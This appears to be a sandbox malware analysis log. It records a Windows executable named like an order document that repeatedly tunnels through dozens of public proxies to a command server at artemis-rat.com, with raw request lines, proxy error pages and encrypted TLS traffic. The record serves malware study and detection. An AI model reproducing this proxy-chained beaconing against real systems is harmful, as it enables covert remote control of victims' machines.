                                                                                        1101192.168.2.952472210.72.11.4680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.076164961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:18:24.092714071 CET1280INHTTP/1.1 503 Service Unavailable
                                                                                        Server: squid/3.5.27
                                                                                        Mime-Version: 1.0
                                                                                        Date: Mon, 11 Mar 2024 15:18:19 GMT
                                                                                        Content-Type: text/html;charset=utf-8
                                                                                        Content-Length: 3790
                                                                                        X-Squid-Error: ERR_DNS_FAIL 0
                                                                                        Vary: Accept-Language
                                                                                        Content-Language: en
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1102192.168.2.95319561.92.189.15807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.076555967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.388931990 CET340INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.12.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Length: 173
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1103192.168.2.952511103.148.112.11780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.076932907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.164244890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.618278980 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1104192.168.2.953179103.179.139.17080807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.077084064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.835788012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.945353985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.148684978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.445442915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.718585014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.039298058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:09.642379045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:26.741898060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1105192.168.2.952485176.194.189.40807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.078994036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.532798052 CET19INHTTP/1.1 200 OK
                                                                                        Mar 11, 2024 16:16:51.323091030 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 62 73 90 38 f8 7f e4 c8 d8 03 af 6a 6f 41 a0 ce 16 fc 85 56 6e ff 06 00 70 df 83 aa 16 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e bs8joAVnp*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:51.728782892 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ef 20 63 3c e7 c0 d3 f4 ca d3 c0 68 73 13 7b be b4 c2 ad 79 b4 4e 26 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                        Data Ascii: C?e c<hs{yN&DOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                        Mar 11, 2024 16:16:51.728806973 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                        Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                        Mar 11, 2024 16:16:51.728915930 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                        Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                        Mar 11, 2024 16:16:51.728935003 CET238INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                        Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%Qh
                                                                                        Mar 11, 2024 16:16:52.072093964 CET498INData Raw: 49 fd 5a 9a ca 01 23 ac 84 80 2b 02 8c 99 97 eb 49 6a 8c 75 d7 c7 de b2 c9 97 9f 58 48 57 0e 35 a1 e4 1a d6 fd 6f 83 81 6f ef 8c cf 97 af c0 85 2a f0 f5 4e 69 09 91 2d e1 68 b8 c1 2b 73 e9 d4 d9 fc 22 c0 37 1f 0b 66 1d 49 ed 02 55 8f 67 e1 32 d7
                                                                                        Data Ascii: IZ#+IjuXHW5oo*Ni-h+s"7fIUg2&p=gm=|42njoK;7D~lF!fUl)f[wIH(3rS5b$9~*AR?,( O_[~v!xW`r"GSiWP)W
                                                                                        Mar 11, 2024 16:16:52.397161007 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 47 1c f7 4d 11 3f 7d 91 d6 cf 16 83 5f 36 f4 b7 14 86 69 b8 a3 62 33 07 a6 5d d0 18 8f 2f 16 1c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 c5 88 c4 9c b6 05 3f 31 a5 d2 53 49 54 c0 63 83 06 aa 02 0e e0
                                                                                        Data Ascii: %! GM?}_6ib3]/(?1SITc8J*`%
                                                                                        Mar 11, 2024 16:16:52.794903040 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 30 e0 eb 9b 8f 78 93 1c 07 7d f4 f4 96 83 66 9e 97 a7 a2 4f 94 db 8e 4f 99 e7 c4 18 24 47 e9 a9 3b ab cd 85 19 13 ee 78 63 68 12 18 6c 64 e8 16 19 45 14 90 73 49 1e b7 14 ad d7 1b da e6 07 1f 72 ec 10
                                                                                        Data Ascii: 0x}fOO$G;xchldEsIr#|6K6Um(F@[2i2t%yKgs7S"#mcZqkWB{.h |sk~2$sP=c15cqZN(ewu`1>
                                                                                        Mar 11, 2024 16:16:52.861144066 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 f2 2a ae 2a cd 83 21 d8 e1 ef bd 5f a7 1f fe 66 50 0e 2d 0b 86 89 f0 d5 7a 4a d5 c6 5e 37 76 f1 90 9a 40 27 c7 09 89 65 01 0f 2e bf 00 f1 bf e0 8a 98 26 39 bd f6 f4 b1 9c 29 1f fe 0e eb 51 7b 6d 3e 62 27 1e
                                                                                        Data Ascii: **!_fP-zJ^7v@'e.&9)Q{m>b'8TB(.||m1BXF(uDbDjs%s-!*EFKOK!CbZ:mi~mvq B=p7s?oR2vjZ95L'
                                                                                        Mar 11, 2024 16:16:53.279561996 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 d2 1c 84 e7 07 00 41 93 18 df a0 83 72 34 b0 4f cb aa 75 43 1c 69 41 49 0a e9 f1 e1 66 c9 18 3f cf e0 dd 3c 6b 01 1e 38 b4 6b af fb 00 48 45 aa d5 89 e3 df 65 28 d8 51 71 5c 77 5a 64 e9 0a 32 7d c2 36 3d 74
                                                                                        Data Ascii: qAr4OuCiAIf?<k8kHEe(Qq\wZd2}6=tO!@?Pjq[2[NNhKMzc' IRL2gVB`!6"8a>8g-mj&AKY\`ZAB|pH:y-SpGBRF|$}bG@.L


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1106192.168.2.9532225.135.83.214807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.079989910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.389820099 CET327INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1107192.168.2.9525018.142.3.14533067672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.082667112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1108192.168.2.953116117.160.250.163807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.082865953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.532757044 CET303INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1109192.168.2.952399103.42.57.1331287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.083468914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.730891943 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1110192.168.2.95324467.43.227.227251277672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.083914042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1111192.168.2.953276188.114.99.37807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.085129976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.239243984 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:44 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1112192.168.2.95318651.161.131.84437127672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.104469061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.961081028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.070311069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1113192.168.2.95320781.17.94.50343007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:44.119579077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:44.945105076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
